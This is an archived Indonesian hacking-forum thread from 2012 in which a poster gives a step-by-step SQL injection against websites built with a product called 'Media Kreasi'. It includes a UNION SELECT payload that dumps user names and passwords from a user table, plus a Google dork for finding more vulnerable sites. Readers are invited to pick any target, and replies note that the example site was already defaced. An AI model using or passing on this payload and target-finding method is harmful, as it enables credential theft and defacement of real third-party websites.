+- Devilzc0de Forum (http://devilzc0de.org/forum)
+-- Forum: Information Technology (/forum-8.html)
+--- Forum: Hacking (/forum-12.html)
+---- Forum: Exploit (/forum-27.html)
+---- Thread: [Tutor] Penerapan SQL Injecton pada "Media Kreasi" (/thread-15453.html)
Penerapan SQL Injecton pada "Media Kreasi" - momodrock - 06-10-2012 08:46 PM
Penerapan SQL Injecton pada "Media Kreasi"
tp cuma iseng2 mau ngetik2, jd bkin trit aja deh..
exploit
target:
http://******/products/category/?id=13' <-- Vuln
disini kita tdk usah cari tahu isi table and column,
lgsung saja
cukup tambahkan "-" stelah "="
http://******/products/category/?id=-13
kmudian masukkan cheat.x
Quote:union select 1,group_concat(nama_user,0xa,pass),3,4,5 from tbl_user--jadinya sprti ini:
Quote:http://******/products/category/?id=-13 union select 1,group_concat(nama_user,0xa,pass),3,4,5 from tbl_user--
udah gitu aja,..
tiggal cari target.x pke dork:
intext:"All rights reserved. - By Media Kreasi"
terserah mau plih target manapun..
cheat.x sama aja
sekian...
jgn di depes, cukup beritahu admin web.x aja.. 
RE: Penerapan SQL Injecton pada "Media Kreasi" - anbu - 06-10-2012 09:44 PM
maaf om ane edit yah webnya ane hide
udah ada yang deface itu
latah banget
RE: Penerapan SQL Injecton pada "Media Kreasi" - genta - 06-10-2012 09:52 PM
cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2y
ama tiggal cari target.x pke dork:intext:"All rights reserved. - By Media Kreasi" ini mksudy apa
maaf bila nanya nya oot bener ne om
.........ijin belajar
RE: Penerapan SQL Injecton pada "Media Kreasi" - tabun - 06-10-2012 09:52 PM
keren jga..
ati2 tar ada singel defacer yg depes..
RE: Penerapan SQL Injecton pada "Media Kreasi" - anharku - 06-10-2012 09:59 PM
hm... lumayan buat belajar SQLi
RE: Penerapan SQL Injecton pada "Media Kreasi" - momodrock - 06-10-2012 10:17 PM
(06-10-2012 09:44 PM)anbu Wrote: maaf om ane edit yah webnya ane hideiah om..
udah ada yang deface itu
thx(06-10-2012 09:52 PM)genta Wrote: cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2yane jg kurang ngerti cara nulis om..
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa
maaf bila nanya nya oot bener ne om
mgkn sprti ini:
tambahkan tanda kurang/mines
Quote:-di depan id artikel,.. misal: http://www.hikz.com/blabla?id=34
jadix sprti ini, http://www.hikz.com/blabla?id=-34
cari target (website) pake dork:
Quote:intext:"All rights reserved. - By Media Kreasi"
tiggal paste di gogel aja om
setelah dpt target, lanjut aja langkah2 di atas..
iahh, udah di antisipasi duluan sama om anbu
@[anharku]
senior
RE: Penerapan SQL Injecton pada "Media Kreasi" - genta - 06-10-2012 10:21 PM
(06-10-2012 10:17 PM)momodrock Wrote:ane emank bener2 gak tau om(06-10-2012 09:44 PM)anbu Wrote: maaf om ane edit yah webnya ane hideiah om..
udah ada yang deface itu
(06-10-2012 09:52 PM)genta Wrote: cukup tambahkan "-" stelah "=" om bisa kasih tau cara peletakan tanda seperti ini harus d mna bisa di buat dr awaly gak lngkah2yane jg kurang ngerti cara nulis om..
intext:"All rights reserved. - By Media Kreasi" ini mksudy apa
maaf bila nanya nya oot bener ne om
mgkn sprti ini:
tambahkan tanda kurang/mines
Quote:-di depan id artikel,.. misal: http://www.hikz.com/blabla?id=34
jadix sprti ini, http://www.hikz.com/blabla?id=-34
cari target (website) pake dork:
Quote:intext:"All rights reserved. - By Media Kreasi"
tiggal paste di gogel aja om
setelah dpt target, lanjut aja langkah2 di atas..
,,,ama ane ini bukan heker om 
..........ijin pelajari dulu om
RE: Penerapan SQL Injecton pada "Media Kreasi" - ToNhoW - 06-10-2012 10:34 PM
yang pepes pasti maho
RE: Penerapan SQL Injecton pada "Media Kreasi" - Eyang Subur - 06-10-2012 11:41 PM
buat TS, ane kasih jempol deh
RE: Penerapan SQL Injecton pada "Media Kreasi" - ditatompel - 06-11-2012 02:38 AM
Thanks omz.. Ijin pelajari dulu..